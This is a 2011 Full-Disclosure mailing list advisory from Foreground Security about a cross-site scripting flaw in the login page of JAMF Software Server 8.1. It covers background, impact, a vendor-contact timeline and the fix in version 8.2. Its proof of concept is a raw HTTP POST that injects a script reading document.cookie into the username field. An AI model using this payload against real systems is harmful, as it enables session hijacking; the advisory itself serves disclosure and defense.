[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] [Foreground Security 2011-001]: Casper Suite (JSS
From: Jose Carlos de Arriba <jcarriba () foregroundsecurity ! com>
Date: 2011-08-27 18:50:35
Message-ID: ADCAC56A09E84A4D8E31044C72B6D31E31BB84C267 () 34093-MBX-C14 ! mex07a ! mlsrvr ! com
[Download RAW message or body]
============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2011-001
- Original release date: August 27, 2011
- Discovered by: Jose Carlos de Arriba
- Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)
- Severity: 4.3/10 (Base CVSS Score)
============================================================
I. VULNERABILITY
-------------------------
Casper Suite - JAMF Software Server (JSS) 8.1 Cross-Site Scripting - XSS (prior versions have \
not been checked but could be vulnerable too).
II. BACKGROUND
-------------------------
JAMF Software Server (JSS). The JSS is the central core to the Casper Suite and ties all the \
other components together. The Casper Suite simplifies the life of system administrators with a \
comprehensive platform to manage Mac OS X computers and iOS mobile devices. The Casper Suite \
increases the efficiency of your IT staff, reduces the cost of ownership, and minimizes \
liability by providing a framework that enforces software licensing compliance, security \
standards, energy usage, and other organizational rules and requirements.
III. DESCRIPTION
-------------------------
JAMF Software Server (JSS) presents a Cross-Site Scripting vulnerability on its "username" \
parameter in the login page, due to an insufficient sanitization on user supplied data and \
encoding output. A malicious user could perform session hijacking or phishing attacks.
IV. PROOF OF CONCEPT
-------------------------
POST /index.html HTTP/1.1
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=XXXXXXXXXXXXXXX; JSESSIONID=YYYYYYYYYYYYYY; JSESSIONID=ZZZZZZZZZZZZZZZZZZZZ; \
tsfrwquc=""
Host: X.X.X.X:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
password=ForegroundSecurity&submit=Login&username="><script>alert(document.cookie)</alert>
V. BUSINESS IMPACT
-------------------------
An attacker could perform session hijacking or phishing attacks.
VI. SYSTEMS AFFECTED
-------------------------
JAMF Software Server (JSS) 8.1 (prior versions have not been checked but could be vulnerable \
too).
VII. SOLUTION
-------------------------
Fixed on 8.2 version
VIII. REFERENCES
-------------------------
http://www.jamfsoftware.com/
http://www.foregroundsecurity.com/
http://www.painsec.com
IX. CREDITS
-------------------------
This vulnerability has been discovered by Jose Carlos de Arriba (jcarriba (at) \
foregroundsecurity (dot) com, dade (at) painsec (dot) com).
X. REVISION HISTORY
-------------------------
-
XI. DISCLOSURE TIMELINE
-------------------------
April 25, 2011: Vulnerability discovered by Jose Carlos de Arriba.
April 25, 2011: Vendor contacted by email (No response)
May 11, 2011: Vendor contacted by phone and security advisory sent by email.
July 8, 2011: Vulnerability fixed on 8.2 version release
August 27, 2011: Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"with no warranties or \
guarantees of fitness of use or otherwise.
Jose Carlos de Arriba, CISSP
Senior Security Analyst
Foreground Security
www.foregroundsecurity.com
jcarriba@foregroundsecurity.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic